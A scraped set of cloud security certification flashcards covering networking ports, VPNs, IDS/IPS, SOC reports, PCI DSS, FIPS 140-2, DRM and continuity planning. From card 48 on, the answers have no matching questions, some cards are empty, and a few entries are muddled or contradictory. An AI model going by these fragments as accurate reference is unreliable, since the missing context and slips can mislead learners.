Learnzapp Flashcards

Question 1

Q

Maintenance mode

Answer

A

Generation of new instances is prevented.

Alerting mechanisms are suspended.

Events are logged.

Admin access continues

Question 2

Q

Remember EU member states

Question 3

Q

Maintenance mode :

Live migration
snapshots

Answer

A

Live migration is the term used to describe the movement of functioning virtual instances from one physical host to another and how VMs are moved prior to maintenance on a physical device.

VMs are moved as image snapshots when they are transitioned from production to storage;

During live migration, the VM moves in unencrypted form.

Live migration goes over the network; portable media is not necessary.

Question 4

Q

Tunneling

Answer

A

Generic routing encapsulation (GRE) is a tunneling mechanism, specifically designed for the purpose.

Question 5

Q

SSH tunnelling includes the services

Answer

A

Remote login
Port forwarding
Command Execution

Question 6

Q

TLS

Answer

A

TLS is a session encryption tool that uses asymmetric encryption to create a symmetric session key

Question 7

Q

which risk can make - cloud env unviable

Answer

A

VM Sprawl

Question 8

Q

NAS ( Network attached Storage)

SAN (Storage Area Network)

Answer

A

NAS: file server that provides data access to multiple, heterogeneous machines and users on the network

NAS is designed basically for file sharing across the network.

SAN :A SAN typically presents storage devices to users as attached/mounted drives.

SAN is designed to meet high-performance needs.

Question 9

Q

Dynamic Host Configuration Protocol (DHCP) servers

Answer

A

provide the clients:
-A temp IP Address
- A default gateway
- Time server synchronization

Doesn’t provide - encryption protocols

Question 10

Q

Data in transit ( Secure)

TLS
DNSSEC
IPSec

Answer

A

TLS

-DNSSEC:
Domain Name System Security Extensions (DNSSEC) protects data in transit by reducing the risk of DNS poisoning

-IPSEC - Transport Layer Security (TLS) and Internet Protocol Security (IPSec) reduce the risk of eavesdropping and interception of data.

Question 11

Q

OS Hardening

Answer

A

Remove default accounts
remove unnecessary services
Disallow local save of credentials

Question 12

Q

cloud storage cluster

Answer

A

A tightly coupled cloud storage cluster

Question 13

Q

SSD

Answer

A

Solid-state disks (SSDs) are used in cloud computing today because they operate at high speeds as compared to traditional spinning drives.

Question 14

Q

IETF

IANA

ISO/IEC

Answer

A

The IETF is an international organization of network designers and architects who work together in establishing standards and protocols for the Internet.

IANA oversees global IP address allocation among other Internet tasks.

the ISO/IEC develops, maintains and promotes standards in information technology and information communication technology.

Question 15

Q

ONF : An Organization Normative Framework (ONF)

ANF - application normative frameworks (ANFs)

Answer

A

An Organization Normative Framework (ONF) is a framework of so-called containers of application security best practices catalogued and leveraged by the organization and contains at least one or more subcomponents known as application normative frameworks (ANFs).

Question 16

Q

Brewer-Nash (Chinese Wall)

Answer

A

Brewer-Nash was specifically created for managed services arrangements, where an administrator for a given customer might also have access to a competitor’s data/environment; the model requires that administrators not be assigned to competing customers. In the modern cloud provider model, a cloud data center administrator will almost definitely have access to many customers from the same industry (i.e., competitors) but probably won’t even know it

Question 17

Q

Ports : DNS

Answer

A

DNS:53
google dns server 8.8.8.8.

DNSSEC : Adds digital signatures to DNS , Verify clients to check authenticity of DNS records

Question 18

Q

Network Ports

0 - 1023 - Wellknown ports
1024 - 49151 : registered ports
49152-65535 - dynamic ports

Answer

A

16bit binary numbers
2 power 16 values : 0 - 65,535

0 - 1023 - Wellknown ports
webservers - 80,
secure webserver - 443, mailservers

1024 - 49151 : registered ports
Microsoft reservers 1433 for sql server DB connection

Oracle server - 1521 for its own dbs

49152-65535 - dynamic ports

Question 19

Q

Administrative Services - Ports

21: FTP
22: SSH
3389 - RDP
137,138,139 - Windows -NetBIOS
53: DNS

Question 20

Q

Mail services:

25 : SMTP
110: POP (Post office protocol_
143 : IMAP

Question 21

Q

Webservices:

80: HTTP
443: HTTPS

Question 22

Q

ICMP - Internet Control Message Protocol

PIng
-traceroute

eg: traceroute -I linkedin.com

Answer

A

PIng - identifies live system
-traceroute - identifies network path

Question 23

Q

ICANN

Answer

A

IP Addresses scarce

Question 24

Q

Private IP Address ranges

Answer

A

10.0.0.1 - 10.255.255.255
172.16.0.1 - 172.31.255.255
192.168.0.1-192.168.255.255

Question 25

Q

NAT ( Network address translation)

NAT & Security

PAT - Port address translation

Answer

A

PAT Allows mulitple systems to share the same public IP Address

assigning unique ports to each communication

Question 26

Q

Subnetting : network, host

Answer

A

subdivides larget networks

Question 27

Q

Subnet mask

Question 28

Q

VLAN - Configuring VLANs

Answer

A

Enable VLAN Trunking
Assign Switch ports to VLAN

Question 29

Q

Routers, switches, firewalls

Question 30

Q

DMZ, Bastion hosts

Question 31

Q

stateless firewalls ,
Stateful inspection

firewall rule content

NGFW ( Incorporate contextual information into their decision making)

Answer

A

firewall rule contents
source, destination IP, Ports, action (allow , deny)

implicit deny (default deny)

Question 32

Q

Firewall Role:
NAT Gateway
Content / URL Filtering
Webapplication firewall

Question 33

Q

Network deployment options:
-

Answer

A

Network hardware vs Host based software firewalls
Open source or proprietary
3.Hardware appliance vs Virtual Appliance

Question 34

Q

Network security groups

Answer

A

Serve as IaaS firewalls
Maintaining network SG is customer’s responsibility

Question 35

Q

VPN - Site to site , remote access VPN

Question 36

Q

VPN Endpoints

Answer

A

Firewalls
Routers
Servers
VPN Concentrators

Question 37

Q

IPSec - Works at n/wk layer (layer3)

Answer

A

Works at n/wk layer (layer3)
supports the layer 2 tunneling protocol
provides secure transport
difficult to configure

Question 38

Q

Full tunnel VPN, Split tunnel VPN

Question 39

Q

Always ON VPN (default)

Question 40

Q

IPS , IDS

Question 41

Q

IDS : False positives, false negative error

Question 42

Q

Signature detection systems / rule based detection systems

Answer

A

problem: fail to brand new attacks
advantage: low false positive rate

Question 43

Q

Anomaly detection/ behaviour based detection/ heuristic detection systems (Same)

Answer

A

high false postiitve

Question 44

Q

IPS Deployment models

In-band (inline) : device sits in the path of network commns

out-of-band (passive)
device connects to SPAN port on a switch

Question 45

Q

Zero trust networking

IAM Platforms are the foundation of zero trust approaches

Answer

A

zero trust shifts the focus away from perimeter protection onto strong identity and access mgmt

Question 46

Q

SIEM
SOAR

Question 47

Q

CASB

Answer

A

Enforce security policies in the cloud

Question 48

Q

EDR (Endpoint detection response) platforms

Answer

A

remediate endpoint security issues

Question 49

Q

Security baseline

Answer

A

baselines are generic
they cover uncertain future

Question 50

Q

Accreditation Process

Answer

A

Initiation, security Certification, security Accreditation, continuous monitoring phase

Question 51

Q

SSH Tunneling

Answer

A

doesnt provide content filtering

it provides
remote log-on
port forwarding
command execution

Question 52

Q

Storage Clusters:
Tightly coupled
Loosely Coupled

Answer

A

storage devices are clustered in groups, providing increased performance, flexibility, and reliability.

Question 53

Q

Tightly coupled cluster

Answer

A

tightly coupled architecture also enhances performance a

the tightly coupled cluster has a maximum capacity, whereas the loosely coupled cluster does not.

Question 54

Q

loosely coupled cluster,

Answer

A

A loosely coupled cluster, on the other hand, allows for greater flexibility.

Question 55

Q

DHCP - Dynamic host configuration protocol servers

Answer

A

provide the clinets - temp iP Address, default gateway, time server sync

doesn’t provide Encryption protocols

Question 56

Q

Question 57

Q

Domain 1:

Question 58

Q

Magnetic swipe cards

Answer

A

Data on Magnetic swipe cards is not usually encrypted

Question 59

Q

SOC reports

Answer

A

SOC reports are the audit reporting mechanisms dictated by SSAE 18. SOX is a federal law targeting publicly traded corporations in the United States. SSL is a way to conduct secure online transactions. SABSA is an architecture framework.

Question 60

Q

SSAE Report :
SOC1 - Financial reporting
SOC2- deals with CIA
SOC3: attestation by the auditor

Answer

A

SOC1 - Financial reporting
SOC2- deals with CIA
SOC3: attestation by the auditor

SOC 2 reports were not designed for dissemination outside the target organization

Question 61

Q

Statutory compliance

Answer

A

Statutory compliance refers to state and federal laws. They cannot force a customer to stay with a cloud provider.

Question 62

Q

CASB

Answer

A

provides services - Key escrow, single sign-on, IAM

Question 63

Q

*****Federal Express - Private company

Answer

A

Federal Express is a private company; only federal entities are required to comply with FedRAMP.

Question 64

Q

Elliptical curve cryptography (ECC)

Answer

A

Elliptical curve cryptography (ECC) uses algebraic elliptical curves that result in much smaller keys that can provide the same level of safety as much larger ones used in traditional key cryptography

Answer 48

A

Virtual machine introspection (VMI) is an agentless means of ensuring a VM’s security baseline does not change over time by examining things such as physical address, network settings, and installed OS. These ensure that the baseline has not been inadvertently or maliciously tampered with.

Answer 49

A

Virtualization technologies have been the driving force behind enabling cloud computing to become a real and scalable service due to the savings, sharing, and allocation of resources across multiple tenants and environments.

Answer 50

A

A demilitarized zone (DMZ) isolates network elements that are public facing and would otherwise be vulnerable to attack.

Answer 51

A

A Type 1 hypervisor uses a minimal piece of software to manage the underlying resources. A Type 2 hypervisor is a piece of software installed on top of or as part of a device’s operating system.

Answer 52

A

A hybrid cloud is a combination of two or more distinct cloud infrastructures that remain unique entities but are bound together by standardized or proprietary technology that enables data and application portability.

Answer 53

A

Cloud migration is the process of transitioning all or part of a company’s data, applications, and services from onsite premises behind the firewall to the cloud. This enables information to be provided over the Internet on an on-demand basis.

Answer 54

A

Corporate governance is defined as the relationship between shareholders and other stakeholders in the organization versus the senior management.

Answer 55

A

Something is said to be auditable when it is in a state of readiness for auditing. Cloud providers are often required to maintain a state of auditability as a way of maintaining compliance

Answer 56

A

Cloud server hosting is a type of hosting in which hosting services are available to customers on demand via the Internet as opposed to being provided by a single server or virtual server. In a cloud services model, multiple connected servers that a cloud server comprises provide the hosting environment.

Answer 57

A

Public key infrastructure (PKI) is a framework of programs, procedures, communication protocols, and public key cryptography that enables a diverse group of individuals to communicate securely.

Answer 58

A

Turnstiles are a physical security barrier to prevent piggybacking/tailgating (an unauthorized person coming through an entrance behind someone who is authorized), but they don’t really present much protection for intellectual property in this case.

Egress monitoring (often referred to as “DLP” solutions) is a great way to reduce the likelihood of intellectual property leaving the owner’s control in an unexpected/unapproved manner. Likewise, strong encryption is useful in the cloud to reduce the impact of theft either from leakage to other cloud tenants or from insider threats (such as malicious admins in the employ of the cloud provider). Finally, digital watermarks aid protection of intellectual property by proving original ownership, which is essential for enforcing intellectual property rights (in the case of software design, mainly copyright protections).

Answer 59

A

PCI DSS requires that the CCV (or, sometimes, “CVV” for “card verification value”) only be used in the transaction, not stored. The data described in all the other options may be stored after the transaction is complete.

Answer 60

A

SSAE 18 is the current AICPA audit standard, as of 2018.

Answer 61

A

SABSA is an IT architecture framework

SABSA is a means of looking at security capabilities from a business perspective;

Answer 62

A

COBIT is designed for all types of business, regardless of their purpose;

Answer 63

A

TOGAF is a means to incorporate security architecture with the overall business architecture;

Answer 64

A

ITIL was specifically designed to address service delivery entities

Answer 65

A

NIST SP 800-53 contains guidance for selecting security controls in accordance with the Risk Management Framework.

NIST 800-53 is a standard, not a law,

Answer 66

A

SOX affects publicly traded corporations

Answer 67

A

The SOC 1 report provides information about financial reporting mechanisms of the target only and is of little interest to the IT security professional,

The SOC 1 audit report is not for security controls; it is for financial reporting controls.

Answer 68

A

The SOC 2, Type 2 report will provide details on IT security controls used by the target and how well those controls function.

Answer 69

A

The SOC 3 report is only an attestation that the target was audited and that it passed the audit, without detail

The SOC 3 report is an attestation that the target was audited and that it passed the audit, without detail; you could use the SOC 3 reports to quickly narrow down the list of possible providers by eliminating the ones without SOC 3s.

Answer 70

A

Because PCI DSS is strictly voluntary, and the PCI Council is not a government body but a consortium of private interests, they cannot detain or imprison anyone.
They can, however, assess fees, suspend processing privileges, and require more auditing, s

Answer 71

A

The PCI merchant levels are based on how many transactions a compliant entity engages in over the course of a year.

Level 1: Merchants that process more than 6 million card transactions per year
Level 2: Merchants that process between 1 million and 6 million card transactions per year
Level 3: Merchants that process between 20,000 and 1 million card transactions per year
Level 4: Merchants that process fewer than 20,000 card transactions per year

Answer 72

A

Merchant level 1 is for the merchants that engage in the most transactions per year (six million or more). It carries with it the requirement for the most comprehensive, detailed, and repeated security validation actions.

Answer 73

A

The Federal Information Processing Standard (FIPS) Publication 140-2 defines four levels of security for cryptographic modules, with each level offering increasing physical protection:
Level 1
The lowest level of security, requiring production-grade equipment and externally tested algorithms
Level 2
Improves physical security with pick-resistant locks and role-based authentication
Level 3
Provides a high probability of detecting and responding to physical access attempts, with physical tamper-resistance and identity-based authentication
Level 4
The highest level of security, with tamper-active hardware that erases its contents if it detects changes in normal operating conditions

Answer 74

A

The EAL is a measure of how thoroughly the security features the product vendor claims the product offers have been tested and reviewed, and by whom.

Answer 75

A

The vendor/manufacturer of a given product will pay to have it certified, with the premise that certification costs are offset by premium prices that certified products command and that customers won’t purchase uncertified products.

Answer 76

A

NIST publishes the list of validated crypto modules. The other choices are government or non-government organizations that are not involved with publishing the list of cryptographic modules that meet FIPS 140-2 requirements.

Answer 77

A

Vendors seeking HSM certification under FIPS 140-2 send their products to independent laboratories that have been validated as Cryptographic Module Testing Laboratories under the National Voluntary Laboratory Accreditation Program (the Accreditation Program is run by NIST, which approves the laboratories). As of this writing, 21 labs in the United States and Canada are accredited.

Answer 78

A

FIPS 140-2 is only for SBU Sensitive but unclassified (SBU) data

FIPS 140-2 is the federal standard for the accreditation and distinguishing of secure and well-architected cryptographic modules produced by private sector vendors who see to or are in the process of having their solutions and services certified by the US government departments and regulated industries that collect, store, transfer, or share data that is deemed to be sensitive but not classified.

Answer 79

A

method for reducing the risk of broken authentication and session management

Do not use custom authentication schemes.

Answer 80

A

Check access each time a direct object reference is called by an untrusted source.

Answer 81

A

attacker trying to do with an injection attack:
Trick the application into running commands.

Answer 82

A

reduce risk by:
Do not use custom authentication schemes.

Answer 83

A

HTML escape all HTML attributes.

Answer 84

A

Remediation: Ensure that all HTTP resource requests include a unique, unpredictable token.

Answer 85

A

Example: Having unpatched software in the production environment

technique to reduce:
Perform periodic scans and audits of the environment.

Follow a published, known industry standard for baseline configurations.

A repeatable patching process that includes updating libraries as well as software

Answer 86

A

reduce by:
Set the default to deny all access to functions, and require authentication/authorization for each access request.

Answer 87

A

Remediation: Update to current versions of component libraries as soon as possible.

Review all updates/lists/notifications for components your organization uses.

Answer 88

A

techniques to reduce :
Destroying sensitive data as soon as possible

Using proper key management when encrypting sensitive data

Disabling autocomplete on forms that collect sensitive data

Extensive user training on proper data handling techniques

Answer 89

A

The particular vulnerabilities exist only in a context not being used by developers.

Answer 90

A

Train users to recognize invalidated links.

Don’t use redirects/forwards in your applications.

Answer 91

A

A forward is a situation when instead of an external URL, your website or web application causes the browser to go to different parts of the site. Redirects and forwards are technically identical, the only difference is the type of destination: external URLs vs. internal pages.

Answer 92

A

LDAP is used in constructing and maintaining centralized directory services, which are vital in all aspects of IAM

Answer 93

A

Privileged users should have privileged access to specific systems/data only for the duration necessary to perform their administrative function; any longer incurs more risk than value

Answer 94

A

The CSA points out that data breaches come from a variety of sources, including both internal personnel and external actors

Answer 95

A

Service traffic hijacking can affect all portions of the CIA triad.

Answer 96

A

Denial-of-service attacks staged from multiple machines against a specific target is the definition of a DDoS.

Answer 97

A

Events are anything that can occur in the IT environment, whereas incidents are unscheduled events.

Answer 98

A

The Personal Information Protection and Electronic Documents Act (PIPEDA) is a Canadian law governing protection of personal information.

Answer 99

A

The Federal Information Processing Standard (FIPS) 140-2 standard certifies cryptologic components for use by American federal government entities

Answer 100

A

The Health Information Portability and Accountability Act (HIPAA) is an American law regulating patient information for medical providers

Answer 101

A

The cross-certification model of federated identity requires all participants to review and confirm all the others

Answer 102

A

The community cloud is defined by its joint ownership of assets among a member group.

Answer 103

A

A private cloud is the best option for work in highly regulated industries or industries that involve very sensitive assets.

Answer 104

A

European appliance rental company

Because of European personal data privacy laws, it is extremely important for your company to be sure that the data does not leave the borders of a country approved to handle such data. A private cloud model is the best means for your company to be sure that the data is processed in a data center residing in a particular geophysical location.

Answer 105

A

Big data refers to extremely large data sets used to determine patterns and trends such as purchasing or travel trends of large groups of people.

Answer 106

A

Portability is the term used to describe the ease with which a customer can move from one cloud provider to another; the higher the portability, the less chance for vendor lock-in.

Answer 107

A

A cloud reseller is a firm that contracts with both cloud providers and customers in order to arrange custom services.

The cloud computing reseller purchases hosting services and then resells them.

Answer 108

A

Cloud carrier is a term describing the intermediary between cloud customer and provider that delivers connectivity; this is typically an ISP.

Answer 109

A

when the amount of cash you receive from your operations is less than all expenditures and bills from the sales

Answer 110

A

X.509 is the certificate standard for communicating public key information.

Answer 111

A

Storage, Remote access, Secure sessions

The data on magnetic swipe cards isn’t usually encrypted.

Answer 112

A

Erasure coding is the practice of having sufficient data to replace a lost chunk in data dispersion, protecting against the possibility of a device failing while it holds a given chunk; parity bits serve the same purpose in a traditional RAID configuration

Answer 113

A

EMS resides on client machines

Discovers data assets according to classification/categorization

Egress monitoring solutions (often referred to as DLP tools, where DLP stands for data loss protection or data leak prevention, or some combination of these terms) will often include an agent that resides on client devices in order to inspect data being shared/sent by end users.

E-discovery/forensics
Data exfiltration
Data categorization/classification

Answer 114

A

DRM is mainly designed to protect intellectual property. It can also sometimes be used for securing PII, but intellectual property is a better answer here.

DRM is often deployed to ensure that copyrighted material (frequently software) is only delivered to and used by licensed recipients.

Answer 115

A

experimental technology that might lead to the possibility of processing encrypted data without having to decrypt it first

Answer 116

A

International traffic in arms regulations (ITAR) is a Department of State program

The International Traffic in Arms Regulations (ITAR) are a set of U.S. government regulations that control the export of defense articles and services. The ITAR are administered by the U.S. Department of State’s Directorate of Defense Trade Controls (DDTC).

Answer 117

A

The Export Administration Regulations (EAR) govern the export and re-export of some commodities, software and technology.

Answer 118

A

EAR focuses on dual-use items, while ITAR targets defense-related items.

Export administration regulations (EAR) is a Commerce Department program

International traffic in arms regulations (ITAR) is a Department of State program.

Answer 119

A

A content delivery network (CDN) is a service that distributes data.

Answer 120

A

Data dispersion uses parity bits, data chunks, and encryption.
Data dispersion uses chunks of data, erasure coding, and encryption.

Parity bits and disk striping are characteristic of RAID implementations

Cloud-bursting is a feature of scalable cloud hosting

Answer 121

A

Copyrights are designed to protect tangible expressions of creative works, like books, articles, music, and so on

Copyrights are protected tangible expressions of creative works.

Answer 122

A

Logos and symbols and phrases and color schemes that describe brands are trademarks.

Answer 123

A

Confidential recipes unique to the organization are trade secrets.

Confidential sales and marketing materials unique to the organization are trade secrets.

Answer 124

A

Patents protect processes (as well as inventions, new plantlife, and decorative patterns).

Answer 125

A

Personal cloud storage is the storage of a single user’s data in the cloud, allowing them access from anywhere on the Internet.

Answer 126

A

Volume storage consists of volumes that are attached to virtual storage and act or behave just like a physical drive or array.

Answer 127

A

SSMS is a method of bit splitting that uses the three phases: encryption, using an information dispersal algorithm, and splitting the encryption key using the secret sharing algorithm. The fragments are signed and distributed to different cloud storage services, making it difficult to decrypt without both arbitrarily chosen data and encryption key fragments.

Answer 128

A

Information rights management (IRM) is a means to prevent unauthorized copying and limitation of distribution to only those who pay for content.

Answer 129

A

In crypto-shredding, the purpose is to make the data unrecoverable; saving a backup of the keys would attenuate that outcome because the keys would still exist for the purpose of recovering data. All other steps outline the crypto-shredding process.

Answer 130

A

Data dispersion is basically RAID in the cloud, with data elements parsed and stored over several areas/devices instead of stored as a unit in a single place. RAID (and data dispersion) does aid in BC/DR activities by increasing the robustness and resiliency of stored data, but BC/DR is a much more general discipline, so it is not the optimum answer for the question. SDN is used for abstracting network control commands away from production data, and CDN is usually used for ensuring quality of streaming media.

Where RAID used data striping across multiple drives, with data dispersion this technique is referred to as “chunking,” or sometimes “sharding” when encryption is also used.

Answer 131

A

Mapping to existing access control lists (ACLs) is the trait that allows DRM tools to provide additional access control protections for the organization’s assets. The other options are not characteristics associated with DRM solutions.

Continuous audit trail is the trait that allows DRM tools to log and exhibit all access to a given object. The other options are not characteristics associated with DRM solutions.

Automatic expiration is the trait that allows DRM tools to prevent access to objects when a license expires or to remove protections when intellectual property moves into the public domain. The other options are not characteristics associated with DRM solutions.

Persistence is the trait that allows DRM protection to follow protected files wherever they might be stored/copied. The other options are not characteristics associated with DRM solutions.

Answer 132

A

Encrypting specific tables within the database is one of the options of transparent encryption;

Answer 133

A

Application-level encryption involves encrypting the data before it enters the fields of the database; it is much more difficult to search and review data that has been encrypted, so this reduces the functionality of the database.

Answer 134

A

Event monitoring tools can help detect external hacking efforts by tracking and reporting on common hack-related activity, such as repeated failed login attempts and scanning.

Event monitoring tools can be used to predict system outages by noting decreases in performance; repeated performance issues can be an indicator a device is failing.

Event monitoring tools can detect repeated performance issues, which can be used by administrators and architects to enhance performance/productivity.

Event monitoring tools can detect repeated performance issues, which can be indicative of improper temperature settings in the data center; also, some system monitoring metrics, such as CPU temperature, can directly indicate inadequate HVAC performance

Detecting ambient heating, ventilation, and air-conditioning (HVAC) problems

Incident evidence

Answer 135

A

The DMCA deals with intellectual property and not specifically with personal privacy. It is not included in the CSA CCM.

Answer 136

A

For DRM to work properly, each resource needs to be outfitted with an access policy so that only authorized entities may make use of that resource

Answer 137

A

The proper procedure for crypto-shredding requires two cryptosystems: one to encrypt the target data, the other to encrypt the resulting data encryption keys. All the other answers are incorrect.

Answer 138

A

Digitally signing software code is an excellent method for determining original ownership and has proven effective in major intellectual property rights disputes.

Answer 139

A

Enforcement of copyright is usually a tortious civil action, as a conflict between private parties.

Answer 140

A

heoretical technique would allow encrypted data to be manipulated without decrypting it first

Answer 141

A

theoretical technology would allow superposition of physical states to increase both computing capacity and encryption keyspace?

Answer 142

A

Every additional security measure might reduce a potential threat but definitely will reduce productivity and quality of service. There is always an overhead cost of security

DLP tools can function better if appropriate and accurate classification and labeling is applied throughout the environment and done on a consistent basis.

Answer 143

A

A vulnerability combined with a specific threat is defined as a risk.

Answer 144

A

Business impact analysis (BIA) is designed to identify and ascertain the value of assets in addition to the critical paths and processes.

Answer 145

A

Mean time to repair (MTTR) is the time required to repair a device that has failed or is in need of repair. The term mean indicates the average time as opposed to the actual or past experiences.

Answer 146

A

The term that best describes the amount an organization should expect to lose on an annual basis due to one type of incident is annual loss expectancy (ALE) and is calculated by multiplying the annual rate of occurrence (ARO) by the single loss expectancy (SLE).

Answer 147

A

Heating, ventilation, and air-conditioning (HVAC) systems separate the cool air from the heat caused by servers. They provide air management including racks with built-in ventilation or alternate cold/hot aisles.

Answer 148

A

The backs of the devices face each other and the ambient temperature in the work area is cool, it is called

Answer 149

A

Cold aisle containment is a configuration where the fronts of devices face each other.

Answer 150

A

Recovery point objective (RPO) is a term used in BC and DR describing the tolerable amount of data that might be lost due to an outage before severe consequences are experienced.

Answer 151

A

The maximum tolerable downtime/maximum allowable downtime (MTD/MAD) is a point in time after an outage has occurred and beyond which recovery becomes extremely difficult or impossible.

Answer 152

A

SDN is the idea of separating the network control plane from the actual network forwarding plane. This allows for greater control over networking capabilities and for integration of such things as APIs.

a means to centralize logical control of all networked nodes in the environment, abstracted from the physical connections to each

Answer 153

A

The NBI usually handles traffic between the SDN controllers and SDN applications.

Answer 154

A

Single sign-on (SSO) is similar to federation, but it is limited to a single organization; federation is basically SSO across multiple organizations.

Answer 155

A

The cross-certification federation model is also known as a web of trust.

Answer 156

A

Liquid propane does not spoil, which obviates necessity for continually refreshing and restocking it and might make it more cost-effective

Answer 157

A

The UPS is intended to last only long enough to save production data currently being processed. The exact quantity of time will depend on many variables and will differ from one datacenter to the next.

Answer 158

A

A UPS can provide line conditioning, adjusting power so that it is optimized for the devices it serves and smoothing any power fluctuations; it does not offer any of the other listed functions.

Answer 159

A

Mobile cloud storage is defined as a form of cloud storage that applies to storing an individual’s mobile device data in the cloud and providing the individual with access to the data from anywhere

Answer 160

A

The purpose of the transfer switch is to redirect power consumption from utility power to generator power; this should be done fast enough to ensure power is available when the batteries fail.

Answer 161

A

Controls are mechanisms designed to restrict a list of possible actions down to allowed or permitted actions.

Answer 162

A

Security Assertion Markup Language (SAML) is based on XML. HTTP is used for port 80 web traffic; HTML is used to present web pages

Answer 163

A

Remote access for customer to racked devices in the data center; electrical utilities; connectivity to an Internet service provider (ISP)/the Internet

Answer 164

A

The ISP between the cloud customer and provider

Answer 165

A

VMs are snapshotted and simply stored as files when they are not being used; an attacker who gains access to those file stores could ostensibly steal entire machines in highly portable, easily copied formats. Therefore, these cloud storage spaces must include a significant amount of controls.

Answer 166

A

Snapshotted VM images are usually kept in object storage, as files.

Answer 167

A

the situation when a malicious user or attacker can exit the restrictions of a single host and access other nodes on the network

Answer 168

A

the situation when a malicious user or attacker can exit the restrictions of a virtual machine (VM) and access another VM residing on the same host

Answer 169

A

A secure baseline configuration, applied and maintained automatically, ensures the optimum security footprint with the least attack surface.

Answer 170

A

The cross-certification federation model is also known as a web of trust.

In a web of trust federation model, all of the participating organizations are identity providers; each organization will assign identity credentials to its own authorized users, and all the other organizations in the federation will accept those credentials.

service providers : each organisation
identity provider : each organisation

Answer 171

A

In the proxy federation model, the third party acts on behalf of the member organizations, reviewing each to ensure that they are all acceptable to the others

Answer 172

A

Cloud providers may be reluctant to grant physical access, even to their customers, on the assumption that allowing access would disclose information about security controls. In some cases, cloud customers won’t even know the location(s) of the data center(s) where their data is stored

a cloud audit will depend on which information a cloud provider discloses, which makes auditing difficult and less trustworthy

They frequently rely on third parties: Because cloud audits are often the result of third-party assertions, recipients of cloud audit reports may be more skeptical of the results than they would have been of traditional audits, in which the recipients may have performed firsthand.

Answer 173

A

Automated vulnerability scan on system startup

Automatic registration with the configuration management system

Answer 174

A

Having the backup within the same environment can allow easy rollback to a last known good state or to reinstantiate clean VM images after minor incidents (e.g., a malware infection in certain VMs).

Answer 175

A

you don’t need to include full copies of these governance documents

include:
Tasking for the office responsible for maintaining/enforcing the plan

Contact information for essential entities, including BC/DR personnel and emergency services agencies

Checklists for BC/DR personnel to follow

Answer 176

A

Risk should always be considered from a business perspective. Risk is often balanced by corresponding oppurtunity

Answer 177

A

Legal seizure of another firm’s assets

Resource exhaustion

Multitenancy

Answer 178

A

While it is possible that one guest VM seeing the resource calls of another VM could possibly allow one guest to see the other’s data, it’s much more likely that a user seeing another user’s use of resources, rather than raw data, would allow the viewer to infer something about the victim’s behavior/usage/assets.

Answer 179

A

According to ENISA, custom IAM builds can become weak if not properly implemented.

Answer 180

A

Revoking credentials that might be lost when a device goes missing is a way to mitigate the possibility of those credentials being used by an unauthorized person.

Answer 181

A

The RTO must always be less than the MAD.

The RTO is the measure of time after an interruption at which the company needs to resume critical functions; any service migration must take place within that time.
RTOs vary for every organization; there is no set answer for all organizations. Options A and B might be correct for a given organization but incorrect in the general case because it’s impossible to know an organization’s RTO without knowing more about the organization.

The RTO is the measure of time after an interruption at which the company needs to resume critical functions; any service migration must take place within that time.

Answer 182

A

Cloud providers will probably not allow ____________social engineering_______ as part of a customer’s penetration test.

Answer 183

A

A cloud customer performing a penetration test without the provider’s permission is risking … Prosecution

A penetration test requires the tester to analyze the security of an environment from the perspective of an attacker; this also includes actually taking action that would result in breaching that environment.

Answer 184

A

Security controls operating on a guest VM OS are only active while the VM is active; when the VM is stored, it is snapshotted and saved as a file, so those controls won’t be active either.

Answer 185

A

Legal liability in multiple jurisdictions
Loss of availability due to DDoS

Answer 186

A

The virtualized NIC is part of the Data-Link layer.

Answer 187

A

CDNs are often used in conjunction with SaaS services to deliver high-quality data of large sizes (often multimedia).

Answer 188

A

FM-200 is used as a replacement for older Halon systems specifically because it (unlike Halon) does not deplete the ozone layer.

Answer 189

A

Optimized for cloud deployments, the converged networking model combines the underlying storage and IP networks to maximize the benefits of a cloud workload.

Answer 190

A

Hot site: A fully functional data center that’s usually kept ready around the clock. It’s a near duplicate of an organization’s primary site, with complete backups of user data and full computer systems. Hot sites are the most expensive option and are best for businesses with zero tolerance for downtime and data loss

Warm site: A data center that’s equipped with some or all of the hardware, software, and network services found in a working data center, but doesn’t have live data. Warm sites are a good option for businesses with a lower budget and a need for flexible and fast recovery

Cold site: An empty operational space with basic facilities like air conditioning, power, and communication lines. Cold sites have no or little equipment or hardware, and no network connectivity or data synchronization. Before a cold site can be used, backup data and additional hardware must be sent to the site and installed.

Answer 191

A

A content delivery network (CDN) run by a major provider can handle large-scale DDoS attacks more easily than any of the other solutions. Using DDoS mitigation techniques via an ISP is the next most useful capability, followed by both increases in bandwidth and increases in the number of servers in the web application cluster.

Answer 192

A

full packet capture provides the most accurate reconstruction of user activity, but it is costly to implement due to data storage requirements.

Answer 193

A

When using two different cloud providers, a cloud customer runs the risk that data/software formats used in the operational environment can’t be readily adapted to the other provider’s service, thus causing delays during an actual failover.

Answer 194

A

A framework of containers for all components of application security, best practices, catalogued and leveraged by the organization

Answer 195

A

A set of routines, standards, protocols, and tools for building software applications to access a web based software application or tool

Answer 196

A

there is a one-to-many ratio of Organizational Normative Framework (ONF) to Application normative framework (ANF); each organization has one Organizational Normative Framework (ONF) and many ANFs (one for each application in the organization). Therefore, the Application normative framework (ANF) is a subset of the Organizational Normative Framework (ONF).

Answer 197

A

A standard for exchanging authentication and authorization data between security domains

Answer 198

A

Provides an overview of application security that introduces definitive concepts, principles, and processes involved in application security

Answer 199

A

Host based or network based

A DAM can recognize and block malicious SQL traffic.

Answer 200

A

WAFs operate at Layer 7 of the OSI model.

Answer 201

A

Test performed on an application or software product while it is being executed in memory in an operating system.

Also called fuzz testing, dynamic testing methods should include known bad inputs in order to determine how the program will handle the “wrong” data (will it fail into a state that is less secure than normal operations, etc.).

Answer 202

A

A test environment that isolates untrusted code changes for testing in a nonproduction environment

Sandboxing is often used for testing applications in development or carving out resources that cannot then touch other parts of the same system.

A sandbox can be used to run malware for analysis purposes as it won’t affect (or infect) the production environment; it’s worth noting, though, that some malware is sandbox-aware, so additional antimalware measures are advisable.

Answer 203

A

Initial, Recurring, Refresher

Answer 204

A

Federation is an arrangement that can be made among multiple enterprises allowing them to use the same identification data to obtain access to all enterprises’ resources within the group.

Answer 205

A

Representational State Transfer (REST) relies on stateless, client-server, cacheable communications. It is a software architecture consisting of guidelines and best practices for creating scalable web services.

Answer 206

A

OpenID is one form of authentication used to enable SSO and enables the user to log into more than one application or website using the same credentials.

Answer 207

A

Return on investment (ROI) is a term used to describe a profitability ratio. It is generally calculated by dividing net profit by net assets.

Answer 208

A

